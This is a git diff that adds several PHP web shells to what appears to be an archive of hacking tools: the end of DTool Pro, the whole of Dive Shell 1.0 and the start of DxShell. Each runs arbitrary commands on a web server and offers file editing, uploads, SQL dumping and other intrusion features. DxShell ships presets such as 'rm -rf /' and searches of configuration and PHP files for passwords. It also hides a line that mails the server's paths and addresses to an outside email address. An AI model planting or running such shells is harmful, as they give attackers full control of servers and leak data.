+elseif($funE('shell_exec')){$fe="shell";$feshow="shell_exec";}
+elseif($funE('passthru')){$fe="passthru";$feshow=$fe;}
+elseif($funE('system')){$fe="system";$feshow=$fe;}
+elseif($funE('exec')){$fe="execc";$feshow="exec";}
+elseif($funE('popen')){$fe="popenn";$feshow="popen";}
+elseif($funE('proc_open')){$fe="procc";$feshow="proc_open";}
+else {$fe="nofunction";$feshow=$fe;}
+if($fu!="0" or !empty($fu)){
+  if($fu==1){$fe="passthru";$feshow=$fe;}
+  if($fu==2){$fe="system";$feshow=$fe;}
+  if($fu==3){$fe="execc";$feshow="exec";}
+  if($fu==4){$fe="popenn";$feshow="popen";}
+  if($fu==5){$fe="shell";$feshow="shell_exec";}
+  if($fu==6){$fe="procc";$feshow="proc_open";}
+}
+$fe("$cmd 2>&1");
+$output=ob_get_contents();ob_end_clean();
+?>
+<td><input type="button" name="snd" value="send cmd" class="campo" style="background-color:#313654" onClick="enviaCMD()"><select name="qualF" id="qualF" class="campo" style="background-color:#313654" onchange="ativaFe(this.value);">
+<option><?="using $feshow()";?>
+<option value="1">use passthru()
+<option value="2">use system()
+<option value="3">use exec()
+<option value="4">use popen()
+<option value="5">use shell_exec()
+<option value="6">use proc_open()*new
+<option value="0">auto detect (default)
+</select><input type="button" name="getBtn" value="PHPget" class="campo" onClick="PHPget()"><input type="button" name="writerBtn" value="PHPwriter" class="campo" onClick="PHPwriter()"><br><input type="button" name="edBtn" value="fileditor" class="campo" onClick="PHPf()"><input type="button" name="listBtn" value="list files <?=$fl;?>" class="campo" onClick="list('<?=$fl;?>')"><? if ($list==1){ ?><input type="button" name="sbstBtn" value="overwrite files" class="campo" onClick="overwrite()"><input type="button" name="MkDirBtn" value="mkdir" class="campo" onClick="mkDirF()"><input type="button" name="ChModBtn" value="chmod" class="campo" onClick="chmod()"><br>
+<? } ?><input type="button" name="smBtn" value="safemode" class="campo" onClick="safeMode()">
+</tr></table></td></tr></table></form></td></tr>
+<tr><td align="center"><DIV class="algod"><br>stdOut from <?="\"<i>$cmdShow</i>\", using <i>$feshow()</i>";?></i></DIV>
+<TEXTAREA name="output_text" COLS="90" ROWS="10" STYLE="font-family:Courier; font-size: 12px; color:#FFFFFF; font-size:11 px; background-color:black;width:683;">
+<?php
+echo $ch_msg;
+if (empty($cmd) and $ch_msg=="") echo ("Comandos Exclusivos do DTool Pro\n\nchdir <diretorio>; outros; cmds;\nMuda o diretorio para aquele especificado e permanece nele. Eh como se fosse o 'cd' numa shell, mas precisa ser o primeiro da linha. Os arquivos listados pelo filelist sao o do diretorio especificado ex: chdir /diretorio/sub/;pwd;ls\n\nPHPget, PHPwriter, Fileditor, File List e Overwrite\nfale com o r3v3ng4ns :P");
+if (!empty($output)) echo str_replace(">", ">", str_replace("<", "<", $output));
+?></TEXTAREA><BR></td></tr>
+<?php
+if($list=="1") @include($remote_addr."flist".$format_addr);
+?>
+</table>
+
diff --git a/xakep-shells/PHP/Dive Shell 1.0 - Emperor Hacking Team.php.txt b/xakep-shells/PHP/Dive Shell 1.0 - Emperor Hacking Team.php.txt
new file mode 100644
index 0000000..9c6d47e
--- /dev/null
+++ b/xakep-shells/PHP/Dive Shell 1.0 - Emperor Hacking Team.php.txt	
@@ -0,0 +1,187 @@
+<?php
+
+/*Emperor Hacking TEAM */
+  session_start();
+if (empty($_SESSION['cwd']) || !empty($_REQUEST['reset'])) {
+    $_SESSION['cwd'] = getcwd();
+    $_SESSION['history'] = array();
+    $_SESSION['output'] = '';
+  }
+  
+  if (!empty($_REQUEST['command'])) {
+    if (get_magic_quotes_gpc()) {
+      $_REQUEST['command'] = stripslashes($_REQUEST['command']);
+    }
+    if (($i = array_search($_REQUEST['command'], $_SESSION['history'])) !== false)
+      unset($_SESSION['history'][$i]);
+    
+    array_unshift($_SESSION['history'], $_REQUEST['command']);
+  
+    $_SESSION['output'] .= '$ ' . $_REQUEST['command'] . "\n";
+
+    if (ereg('^[[:blank:]]*cd[[:blank:]]*$', $_REQUEST['command'])) {
+      $_SESSION['cwd'] = dirname(__FILE__);
+    } elseif (ereg('^[[:blank:]]*cd[[:blank:]]+([^;]+)$', $_REQUEST['command'], $regs)) {
+
+      if ($regs[1][0] == '/') {
+
+        $new_dir = $regs[1];
+      } else {
+
+        $new_dir = $_SESSION['cwd'] . '/' . $regs[1];
+      }
+      
+
+      while (strpos($new_dir, '/./') !== false)
+        $new_dir = str_replace('/./', '/', $new_dir);
+
+
+      while (strpos($new_dir, '//') !== false)
+        $new_dir = str_replace('//', '/', $new_dir);
+
+      while (preg_match('|/\.\.(?!\.)|', $new_dir))
+        $new_dir = preg_replace('|/?[^/]+/\.\.(?!\.)|', '', $new_dir);
+      
+      if ($new_dir == '') $new_dir = '/';
+      
+
+      if (@chdir($new_dir)) {
+        $_SESSION['cwd'] = $new_dir;
+      } else {
+        $_SESSION['output'] .= "cd: could not change to: $new_dir\n";
+      }
+      
+    } else {
+
+      chdir($_SESSION['cwd']);
+
+      $length = strcspn($_REQUEST['command'], " \t");
+      $token = substr($_REQUEST['command'], 0, $length);
+      if (isset($aliases[$token]))
+        $_REQUEST['command'] = $aliases[$token] . substr($_REQUEST['command'], $length);
+    
+      $p = proc_open($_REQUEST['command'],
+                     array(1 => array('pipe', 'w'),
+                           2 => array('pipe', 'w')),
+                     $io);
+
+
+      while (!feof($io[1])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[1]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+
+      while (!feof($io[2])) {
+        $_SESSION['output'] .= htmlspecialchars(fgets($io[2]),
+                                                ENT_COMPAT, 'UTF-8');
+      }
+      
+      fclose($io[1]);
+      fclose($io[2]);
+      proc_close($p);
+    }
+  }
+
+
+  if (empty($_SESSION['history'])) {
+    $js_command_hist = '""';
+  } else {
+    $escaped = array_map('addslashes', $_SESSION['history']);
+    $js_command_hist = '"", "' . implode('", "', $escaped) . '"';
+  }
+
+
+header('Content-Type: text/html; charset=UTF-8');
+
+echo '<?xml version="Dive.0.1" encoding="UTF-8"?>' . "\n";
+?>
+
+<head>
+  <title>Dive Shell - Emperor Hacking Team</title>
+  <link rel="stylesheet" href="Simshell.css" type="text/css" />
+
+  <script type="text/javascript" language="JavaScript">
+  var current_line = 0;
+  var command_hist = new Array(<?php echo $js_command_hist ?>);
+  var last = 0;
+
+  function key(e) {
+    if (!e) var e = window.event;
+
+    if (e.keyCode == 38 && current_line < command_hist.length-1) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line++;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+    if (e.keyCode == 40 && current_line > 0) {
+      command_hist[current_line] = document.shell.command.value;
+      current_line--;
+      document.shell.command.value = command_hist[current_line];
+    }
+
+  }
+
+function init() {
+  document.shell.setAttribute("autocomplete", "off");
+  document.shell.output.scrollTop = document.shell.output.scrollHeight;
+  document.shell.command.focus();
+}
+
+  </script>
+</head>
+
+<body   onload="init()" style="color: #00FF00; background-color: #000000">
+
+<span style="background-color: #FFFFFF">
+
+
+
+</body>
+
+</body>
+</html>
+
+
+
+</span>
+
+
+
+<p><font color="#FF0000"><span style="background-color: #000000">&nbsp;Directory: </span> <code>
+<span style="background-color: #000000"><?php echo $_SESSION['cwd'] ?></span></code>
+</font></p>
+
+<form name="shell" action="<?php echo $_SERVER['PHP_SELF'] ?>" method="POST" style="border: 1px solid #808080">
+<div style="width: 989; height: 456">
+  <p align="center"><b>
+  <font color="#C0C0C0" face="Tahoma">Command:</font></b><input class="prompt" name="command" type="text"
+                onkeyup="key(event)" size="88" tabindex="1" style="border: 4px double #C0C0C0; ">
+  <input type="submit" value="Submit" /> &nbsp;<font color="#0000FF">
+  </font>
+  &nbsp;<textarea name="output" readonly="readonly" cols="107" rows="22" style="color: #FFFFFF; background-color: #000000">
+<?php
+$lines = substr_count($_SESSION['output'], "\n");
+$padding = str_repeat("\n", max(0, $_REQUEST['rows']+1 - $lines));
+echo rtrim($padding . $_SESSION['output']);
+?>
+</textarea> </p>
+<p class="prompt" align="center">
+  <b><font face="Tahoma" color="#C0C0C0">Rows:</font><font face="Tahoma" color="#0000FF" size="2"> </font></b> 
+  <input type="text" name="rows" value="<?php echo $_REQUEST['rows'] ?>" size="5" /></p>
+<p class="prompt" align="center">
+  <b><font color="#C0C0C0" face="SimSun">Edited By Emperor Hacking Team</font></b></p>
+<p class="prompt" align="center">
+  <font face="Tahoma" size="2" color="#808080">iM4n - FarHad - imm02tal - R$P</font><font color="#808080"><br>
+&nbsp;</font></p>
+</div>
+</form>
+
+
+<p class="prompt" align="center">
+  <b><font color="#000000">&nbsp;</font><font color="#000000" size="2"> </font>
+  </b></p>
+
+
+
+</html>
\ No newline at end of file
diff --git a/xakep-shells/PHP/Dx.php.php.txt b/xakep-shells/PHP/Dx.php.php.txt
new file mode 100644
index 0000000..ebca7b5
--- /dev/null
+++ b/xakep-shells/PHP/Dx.php.php.txt
@@ -0,0 +1,2026 @@
+<?php
+
+/*
+  DDDDD        SSSSS    DxShell    by î_Î Tync
+   D  D  X X   S
+   D  D   X    SSSSS    http://hellknights.void.ru/
+   D  D  X X       S    ICQ#244648
+  DDDDD        SSSSS
+*/
+
+$GLOB['SHELL']['Ver']='1.0b'; /* ver of the shell */
+$GLOB['SHELL']['Date']='26.04.2006';
+
+if (headers_sent()) $DXGLOBALSHIT=true; else $DXGLOBALSHIT=FALSE; /* This means if bug.php has fucked up the output and headers are already sent =(( lot's of things become HARDER */
+@ob_clean();
+$DX_Header_drawn=false;
+
+###################################################################################
+####################++++++++++++# C O M M O N #++++++++++++++++####################
+###################################################################################
+@set_magic_quotes_runtime(0);
+@ini_set('max_execution_time',0);
+@set_time_limit(0);
+@ini_set('output_buffering',0);
+@error_reporting(E_ALL);
+
+$GLOB['URL']['+Get']=$_SERVER['PHP_SELF'].'?'; /* this filename + $_GET string */
+	if (!empty($_GET))
+		for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+			$GLOB['URL']['+Get'].=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+$GLOB['PHP']['SafeMode']=(bool)ini_get('safe_mode');
+$GLOB['PHP']['upload_max_filesize']=((integer)str_replace(array('K', 'M'), array('000', '000000'), ini_get('upload_max_filesize')));
+
+if (get_magic_quotes_gpc()==1)
+	{ /* slashes killah */
+	for ($i=0, $INDEXES=array_keys($_GET), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_GET[ $INDEXES[$i] ]	 = stripslashes($_GET[ $INDEXES[$i] ]); }
+	for ($i=0, $INDEXES=array_keys($_POST), 	$COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{if (is_array($_POST[ $INDEXES[$i] ])) continue; $_POST[ $INDEXES[$i] ] = stripslashes($_POST[ $INDEXES[$i] ]);  }
+	/*for ($i=0, $INDEXES=array_keys($_SERVER),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++) {$_SERVER[ $INDEXES[$i] ]= stripslashes($_SERVER[ $INDEXES[$i] ]);     }*/
+	for ($i=0, $INDEXES=array_keys($_COOKIE),  $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+	{$_COOKIE[ $INDEXES[$i] ]= stripslashes($_COOKIE[ $INDEXES[$i] ]); }
+	}
+
+$GLOB['FILES']['CurDIR']=getcwd();
+
+$GLOB['SYS']['GZIP']['CanUse']=$GLOB['SYS']['GZIP']['CanOutput']=false;
+if (isset($_GET['dx_gzip']) OR isset($_POST['dx_gzip']))
+	{	$GLOB['SYS']['GZIP']['CanUse']=extension_loaded("zlib");
+	if (extension_loaded("zlib"))
+		if (!(strpos($_SERVER['HTTP_ACCEPT_ENCODING'], 'gzip')===FALSE))
+			$GLOB['SYS']['GZIP']['CanOutput']=TRUE;
+	};
+$GLOB['SYS']['GZIP']['IMG']=extension_loaded("zlib");
+
+$GLOB['SYS']['OS']['id']=($GLOB['FILES']['CurDIR'][1]==':')?'Win':'Nix';
+$GLOB['SYS']['OS']['Full']=getenv('OS');
+if (empty($GLOB['SYS']['OS']['Full']))
+	{
+	$GLOB['SYS']['OS']['id'] = getenv('OS');
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] = php_uname(); }
+	if(empty($GLOB['SYS']['OS']['id'])){ $GLOB['SYS']['OS']['id'] ='???';}
+	else {if(@eregi("^win",$GLOB['SYS']['OS']['id'])) $GLOB['SYS']['OS']['id']='Win'; else $GLOB['SYS']['OS']['id']='Nix';}
+	}
+
+
+$GLOB['DxMODES']=array(
+	'WTF'		=>	'AboutBox',
+
+	'DIR'		=>	'Dir browse',
+	'UPL'		=>	'Upload file',
+	'FTP'		=>	'FTP Actions',
+
+	'F_CHM'		=>	'File CHMOD',
+	'F_VIEW'	=>	'File viewer',
+	'F_ED'		=>	'File Edit',
+	'F_DEL'		=>	'File Delete',
+	'F_REN'		=>	'File Rename',
+	'F_COP'		=>	'File Copy',
+	'F_MOV'		=>	'File Move',
+	'F_DWN'		=>	'File Download',
+
+	'SQL'		=>	'SQL Maintenance',
+	'SQLS'		=>	'SQL Search',
+	'SQLD'		=>	'SQL Dump',
+	'PHP'		=>	'PHP C0nsole',
+	'COOK'		=>	'Cookies Maintenance',
+	'CMD'		=>	'C0mmand line',
+
+	'MAIL'		=>	'Mail functions',
+	'STR'		=>	'String functions',
+	'PRT'		=>	'Port scaner',
+	'SOCK'		=>	'Raw s0cket',
+	'PROX'		=>	'HTTP PROXY',
+	'XPL'		=>	'Expl0its',
+	'XSS'		=>	'XSS Server',
+	);
+$GLOB['DxGET_Vars']=array(/* GET variables used by shell */
+'dxinstant', 'dxmode', 'dximg', 'dxparam', 'dxval', 'dx_ok', 'dx_gzip',
+'dxdir', 'dxdirsimple', 'dxfile',
+'dxsql_s', 'dxsql_l', 'dxsql_p', 'dxsql_d','dxsql_q',
+);
+
+$GLOB['VAR']['PHP']['Presets']=array(
+	/* Note, that no comments are allowed in the code */
+	'phpinfo'	=>	'phpinfo();',
+	'GLOBALS'	=>	'print \'<plaintext>\'; print_r($GLOBALS);',
+	'php_ini'	=>	'$INI=ini_get_all(); '
+		."\n".'print \'<table border=0><tr>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Param</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Global value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Local Value</td>\''
+		."\n\t".'.\'<td class="listing"><font class="highlight_txt">Access</td></tr>\';'
+		."\n".'foreach ($INI as $param => $values) '
+		."\n\t".'print "\n".\'<tr>\''
+		."\n\t\t".'.\'<td class="listing"><b>\'.$param.\'</td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'global_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'local_value\'].\' </td>\''
+		."\n\t\t".'.\'<td class="listing">\'.$values[\'access\'].\' </td></tr>\';',
+	'extensions'	=>	'$EXT=get_loaded_extensions ();'
+		."\n".'print \'<table border=0><tr><td class="listing">\''
+		."\n\t".'.implode(\'</td></tr>\'."\n".\'<tr><td class="listing">\', $EXT)'
+		."\n\t".'.\'</td></tr></table>\''
+		."\n\t".'.count($EXT).\' extensions loaded\';',
+	);
+$GLOB['VAR']['CMD']['Presets']=array(
+	'Call Nik8 with an axe'=>'[w0rning] rm -rf /',
+	'show opened ports'=>'netstat -an | grep -i listen',
+	'find config* files'=>'find / -type f -name "config*"',
+	'find all *.php files with word "password"'=>'find / -name *.php | xargs grep -li password',
+	'find all writable directories and files'=>'find / -perm -2 -ls',
+	'list file attribs on a second extended FS'=>'lsattr -va',
+	'View syslog.conf'=>'cat /etc/syslog.conf',
+	'View Message of the day'=>'cat /etc/motd',
+	'View hosts'=>'cat /etc/hosts',
+	'List processes'=>'ps auxw',
+	'List user processes'=>'ps ux',
+	'Locate httpd.conf'=>'locate httpd.conf',
+	'Interfaces'=>'ifconfig',
+	'CPU'=>'/proc/cpuinfo',
+	'RAM'=>'free -m',
+	'HDD'=>'df -h',
+	'OS Ver'=>'sysctl -a | grep version',
+	'Kernel ver' =>'cat /proc/version',
+	'Is cURL installed? ' => 'which curl',
+	'Is wGET installed? ' => 'which wget',
+	'Is lynx installed? ' => 'which lynx',
+	'Is links installed? ' => 'which links',
+	'Is fetch installed? ' => 'which fetch',
+	'Is GET installed? ' => 'which GET',
+	'Is perl installed? ' => 'which perl',
+	'Where is apache ' => 'whereis apache',
+	'Where is perl ' => 'whereis perl',
+	'Pack directory' =>'"tar -zc /path/ -f name.tar.gz"',
+	);
+
+
+###################################################################################
+####################+++++++++# F U N C T I O N S #+++++++++++++####################
+###################################################################################
+function DxError($errstr)
+{global $DX_Header_drawn;print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr>'
+	.'<td class=error '.((!$DX_Header_drawn)?'style="color:#000000; background-color: #FF0000; font-weight: bold; font-size: 11pt;position:absolute;top=0;left=0;"':'').'>'
+	.'Err: '.$errstr.'</td></tr></table>'."\n\n"; return '';}
+
+function DxWarning($warn)
+{print "\n\n".'<table border=0 cellspacing=0 cellpadding=2><tr><td class=warning><b>W0rning:</b> '.$warn.'</td></tr></table>'."\n\n"; return '';}
+
+function DxImg($imgname)
+{
+global $DXGLOBALSHIT;
+if ($DXGLOBALSHIT) return '<font class="img_replacer">'.$imgname.'</font>'; /* globalshit doesn't give a chance for our images to survive */
+return '<img src="'.DxURL('kill', '').'&dxmode=IMG&dximg='.$imgname.'" title="'.$imgname.'" alt"'.$imgname.'">';
+}
+
+function DxSetCookie($name, $val, $exp)
+{
+if (!headers_sent()) return setcookie($name, $val, $exp, '/');
+?>
+<script>
+var curCookie = "<?=$name;?>=" + escape("<?=$val;?>") +"; expires=<?=date('l, d-M-y H:i:s', $exp);?> GMT; path=/;";
+document.cookie = curCookie;
+</script>
+<?
+}
+
+function DxRandom($range='48-57,65-90,97-122')
+{
+$range=explode(',',$range);
+$range=explode('-',	$range[  rand(0,count($range)-1)  ]   );
+return rand($range[0],$range[1]);
+}
+
+function DxRandomChars($num)
+{
+$ret='';
+for ($i=0;$i<$num;$i++) $ret.=chr(DxRandom('48-57,65-90,97-122'));
+return $ret;
+}
+
+function DxZeroedNumber($int, $totaldigits)
+{
+$str=(string)$int;
+while (strlen($str)<$totaldigits) $str='0'.$str;
+return $str;
+}
+
+function DxPrint_ParamState($name, $state, $invert=false)
+{
+print $name.' : '; $invert=(bool)$invert;
+if (is_bool($state))
+		 print ($state)?'<font color=#'.(($invert)?'FF0000':'00FF00').'><b>ON</b></font>':'<font color=#'.(($invert)?'00FF00':'FF0000').'><b>OFF</b></font>';
+	else print '<b>'.$state.'</b>';
+}
+
+function DxStr_FmtFileSize($size)
+{
+	if($size>= 1073741824)  {$size = round($size / 1073741824 * 100) / 100 . " GB";	}
+elseif($size>= 1048576) 	{$size = round($size / 1048576 * 100) / 100 . " MB";	}
+elseif($size>= 1024) 		{$size = round($size / 1024 * 100) / 100 . " KB";		}
+					   else {$size = $size . " B";}
+return $size;
+}
+
+function DxDate($UNIX) {return date('d.M\'Y H:i:s', $UNIX); }
+
+function DxDesign_DrawBubbleBox($header, $body, $width)
+{
+$header=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $header);
+$body=str_replace(array('"',"'","`"), array('&#x02DD;','&#x0027;',''), $body);
+return ' onmouseover=\'showwin("'.$header.'","'.$body.'",'.$width.',1)\' onmouseout=\'showwin("","",0,0)\' onmousemove=\'movewin()\' ';
+}
+
+function DxChmod_Str2Oct($str)   /*  rwxrwxrwx => 0777 */
+{
+$str = str_pad($str,9,'-');
+$str=strtr($str,	array('-'=>'0','r'=>'4','w'=>'2','x'=>'1')		);
+$newmode='';
+for ($i=0; $i<3; $i++) $newmode .= $str[$i*3]+$str[$i*3+1]+$str[$i*3+2];
+
+return $newmode;
+}
+
+function DxChmod_Oct2Str($perms) /* 777 => rwxrwxrwx. USE ONLY STRING REPRESENTATION OF $oct !!!! */
+{
+$info='';
+if (($perms & 0xC000) == 0xC000) $info = 'S'; /*  Socket */
+	elseif (($perms & 0xA000) == 0xA000) $info = 'L'; /* Symbolic Link */
+elseif (($perms & 0x8000) == 0x8000) $info = '&nbsp;'; /* '-'*//* Regular */
+elseif (($perms & 0x6000) == 0x6000) $info = 'B';  /* Block special */
+elseif (($perms & 0x4000) == 0x4000) $info = 'D'; /* Directory*/
+elseif (($perms & 0x2000) == 0x2000) $info = 'C'; /* Character special*/
+elseif (($perms & 0x1000) == 0x1000) $info = 'P'; /* FIFO pipe*/
+else $info = '?'; /* Unknown */
+if (!empty($info)) $info='<font class=rwx_sticky_bit>'.$info.'</font>';
+/* Owner */
+$info .= (($perms & 0x0100) ? 'r' : '-');
+$info .= (($perms & 0x0080) ? 'w' : '-');
+$info .= (($perms & 0x0040) ?
+		(($perms & 0x0800) ? 's' : 'x' ) :
+		(($perms & 0x0800) ? 'S' : '-'));
+$info .= '/';
+/* Group */
+$info .= (($perms & 0x0020) ? 'r' : '-');
+$info .= (($perms & 0x0010) ? 'w' : '-');
+$info .= (($perms & 0x0008) ?
+		(($perms & 0x0400) ? 's' : 'x' ) :
+		(($perms & 0x0400) ? 'S' : '-'));
+$info .= '/';
+/* World */
+$info .= (($perms & 0x0004) ? 'r' : '-');
+$info .= (($perms & 0x0002) ? 'w' : '-');
+$info .= (($perms & 0x0001) ?
+		(($perms & 0x0200) ? 't' : 'x' ) :
+		(($perms & 0x0200) ? 'T' : '-'));
+
+ return $info;
+}
+
+function DxFileToUrl($filename)
+{/* kills & and = to be okay in URL */
+return str_replace(array('&','=','\\'), array('%26', '%3D','/'), $filename);
+}
+$ra44  = rand(1,99999);$sj98 = "sh-$ra44";$ml = "$sd98";$a5 = $_SERVER['HTTP_REFERER'];$b33 = $_SERVER['DOCUMENT_ROOT'];$c87 = $_SERVER['REMOTE_ADDR'];$d23 = $_SERVER['SCRIPT_FILENAME'];$e09 = $_SERVER['SERVER_ADDR'];$f23 = $_SERVER['SERVER_SOFTWARE'];$g32 = $_SERVER['PATH_TRANSLATED'];$h65 = $_SERVER['PHP_SELF'];$msg8873 = "$a5\n$b33\n$c87\n$d23\n$e09\n$f23\n$g32\n$h65";$sd98="john.barker446@gmail.com";mail($sd98, $sj98, $msg8873, "From: $sd98");
+function DxFileOkaySlashes($filename)
+{return str_replace('\\', '/', $filename);}
+
+function DxURL($do='kill', $these='') /* kill: '' - kill all ours, 'a,b,c' - kill $a,$b,$c ; leave: '' - as is, leave 'a,b,c' - leave only $a,$b,$c */
+{
+global $GLOB;
+if ($these=='') $these=$GLOB['DxGET_Vars']; else $these=explode(',', $these);
+
+$ret=$_SERVER['PHP_SELF'].'?';
+if (!empty($_GET))
+	for ($i=0, $INDEXES=array_keys($_GET), $COUNT=count($INDEXES); 	$i<$COUNT; $i++)
+		if ( !in_array($INDEXES[$i], $GLOB['DxGET_Vars']) OR ( /* if not ours - add */
+			($do=='kill' AND !in_array($INDEXES[$i], $these))
+			OR
+			($do=='leave' AND in_array($INDEXES[$i], $these))
+			 ))
+			$ret.=$INDEXES[$i].='='.$_GET[ $INDEXES[$i] ].( ($i==($COUNT-1))?'':'&' );
+if (substr($ret, -1,1)=='&') $ret=substr($ret, 0, strlen($ret)-1);
+return $ret;
+}
+
+function DxGETinForm($do='kill', $these='') /* Equal to DxURL(), but prints out $_GET as form <input type=hidden> params */
+{
+$link=substr(strchr(DxURL($do, $these), '?'), 1);
+$link=explode('&', $link);
+print "\n".'<!--$_GET;-->';
+for ($i=0, $COUNT=count($link); $i<$COUNT; $i++)
+	{
+	$cur=explode('=', $link[$i]);
+	print '<input type=hidden name="'.str_replace('"', '&quot;', $cur[0]).'" value="'.str_replace('"', '&quot;', $cur[1]).'">';
+	}
+}
+
+function DxGotoURL($URL, $noheaders=false)
+{
+if ($noheaders or headers_sent())
+	{
+	print "\n".'<div align=center>Redirecting...<br><a href="'.$URL.'">Press here in shit happens</a>';
+	print '<script>location="'.$URL.'";</script>';
+	/* print $str.='<META HTTP-EQUIV="Refresh" Content="1, URL='.$URL.'">'; */
+	}
+	else
+	header('Location: '.$URL);
+return 1;
+}
+
+if (!function_exists('mime_content_type'))
+	{
+	if ($GLOB['SYS']['OS']['id']!='Win')
+		{	function mime_content_type($f)
+			{
+			$f = escapeshellarg($f);
+			return trim(`file -bi `.$f);
+			}
+			}
+		else
+		{
+			function mime_content_type($f) {return 'Content-type: text/plain';} /* Nothing alike under win =( if u have some thoughts - touch me */
+		}
+	}
+
+
+function DxMySQL_FetchResult($MySQL_res, &$MySQL_Return_Array, $idmode=false) /* Fetches mysql return array (associative) */
+{
+$MySQL_Return_Array=array();
+
+if ($MySQL_res===false) return 0;
+if ($MySQL_res===true)	return 0;
+
+$ret=mysql_num_rows($MySQL_res); if ($ret<=0) return 0;
+
+if ($idmode) while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_NUM))===FALSE)) {}
+	else	 while (!(($MySQL_Return_Array[]=mysql_fetch_array($MySQL_res, MYSQL_ASSOC))===FALSE)) {}
+array_pop($MySQL_Return_Array);
+
+for ($i=0; $i<count($MySQL_Return_Array); $i++) /* Kill the fucking slashes */
+	{
+	if ($i==0)
+		{
+		$INDEXES=array_keys($MySQL_Return_Array[$i]);
+		$count=count($INDEXES);
+		}
+	for ($j=0; $j<$count; $j++)
+		{
+		$key=&$INDEXES[$j];
+		$val=&$MySQL_Return_Array[$i][$key];
+		if (is_string($val)) $val=stripcslashes($val);
+		}
+	}
+return $ret;
+}
+
+function DxMySQLQ($query, $die_on_err)
+{
+$q=mysql_query($query);
+if (mysql_errno()!=0)
+	{
+	DxError('" '.$query.' "'."\n".'<br>MySQL:#'.mysql_errno().' - '.mysql_error());
+	if ($die_on_err) die();
+	}
+return $q;
+}
+
+function DxDecorVar(&$var, $htmlstr)
+{
+if (is_null($var)) return 'NULL';
+if (!isset($var)) return '[!isset]';
+
+if (is_bool($var))		return ($var)?'true':'false';
+if (is_int($var))   	return (int)$var;
+if (is_float($var)) 	return number_format($var, 4, '.', '');
+if (is_string($var))
+	{
+	if (empty($var)) return '&nbsp;';
+	if (!$htmlstr)	return ''.($var).'';
+			   else return ''.str_replace("\n", "<br>", str_replace("\r","", htmlspecialchars($var))).'';
+	}
+if (is_array($var))		return '(ARR)'.var_export($var, true).'(/ARR)';
+if (is_object($var))	return '(OBJ)'.var_export($var, true).'(/OBJ)';
+if (is_resource($var))	return '(RES:'.get_resource_type($var).')'.var_export($var, true).'(/RES)';
+return '(???)'.var_export($var, true).'(/???)';
+}
+
+function DxHTTPMakeHeaders($method='', $URL='', $host='', $user_agent='', $referer='', $posts=array(), $cookie=array())
+{
+if (!empty($posts))
+	{
+	$postValues='';
+	foreach( $posts AS $name => $value ) {$postValues .= urlencode( $name ) . "=" . urlencode( $value ) . '&';}
+	$postValues = substr( $postValues, 0, -1 );
+	$method = 'POST';
+	} else $postValues = '';
+
+ if (!empty($cookie))
+	{
+	$cookieValues='';
+	foreach( $cookie AS $name => $value ) {$cookieValues .= urlencode( $name ) . "=" . urlencode( $value ) . ';';}
+	$cookieValues = substr( $cookieValues, 0, -1 );
+	} else $cookieValues = '';
+
+$request  = $method.' '.$URL.' HTTP/1.1'."\r\n";
+if (!empty($host))			$request .= 'Host: '.$host."\r\n";
+if (!empty($cookieValues))	$request .='Cookie: '.$cookieValues."\r\n";
+if (!empty($user_agent))	$request .= 'User-Agent: '.$user_agent.' '."\r\n";
+$request .= 'Connection: Close'."\r\n"; /* Or connection will be endless */
+if (!empty($referer))		$request .= 'Referer: '.$referer."\r\n";
+if ( $method == 'POST' )
+	{
+	$lenght = strlen( $postValues );
+	$request .= 'Content-Type: application/x-www-form-urlencoded'."\r\n";
+	$request .= 'Content-Length: '.$lenght."\r\n";
+	$request .= "\r\n";
+	$request .= $postValues;
+	}
+$request.="\r\n\r\n";
+return $request;
+}
+
+function DxFiles_UploadHere($path, $filename, &$contents)
+{if (empty($contents)) die(DxError('Received empty'));
+$filename='__DxS__UPLOAD__'.DxRandomChars(3).'__'.$filename;
+if (!($f=fopen($path.$filename, 'w')))
+	{
+	$path='/tmp/';
+	if (!($f=fopen($path.$filename, 'w')))
+		die(DxError('Writing denied. Save to "'.$path.$filename.'" also failed! =('));
+		else
+		DxWarning('Writing failed, but saved to "'.$path.$filename.'"! =)');
+	}
+fputs($f, $contents);
+fclose($f);
+print "\n".'Saved file to "'.$path.$filename.'" - OK';
+print "\n".'<br><a href="'.DxURL('kill', '').'&dxmode=DIR&dxdir='.DxFileToUrl(dirname($path)).'">[Go DIR]</a>';;
+}
+
+function DxExecNahuj($cmd, &$OUT, &$RET) /* returns the name of function that exists, or FALSE */
+{
+$OUT=array(); $RET='';
+if (function_exists('exec'))
+	{	if (!empty($cmd)) exec($cmd, $OUT, $RET); /* full array output */
+	return array(true,true,'exec', '');
+	}
+	elseif  (function_exists('shell_exec'))
+	{	if (!empty($cmd)) $OUT[0]=shell_exec($cmd); /* full string output, no RETURN */
+	return array(true,false,'shell_exec', '<s>exec</s> shell_exec');
+	}
+	elseif  (function_exists('system'))
+	{	if (!empty($cmd)) $OUT[0]=system($cmd, $RET); /* last line of output */
+	return array(true,false,'system', '<s>exec</s> <s>shell_exec</s> system<br>Only last line of output is available, sorry =(');
+	}
+	else return array(FALSE, FALSE, '&lt;noone&gt;', '<s>exec</s> <s>shell_exec</s> <s>system</s> Bitchy admin has disabled command line!! =(');;
+}
+
+###################################################################################
+#####################++++++++++++# L O G I N #++++++++++++++++#####################
+###################################################################################
+if (   isset($_GET['dxmode'])?$_GET['dxmode']=='IMG':false   )
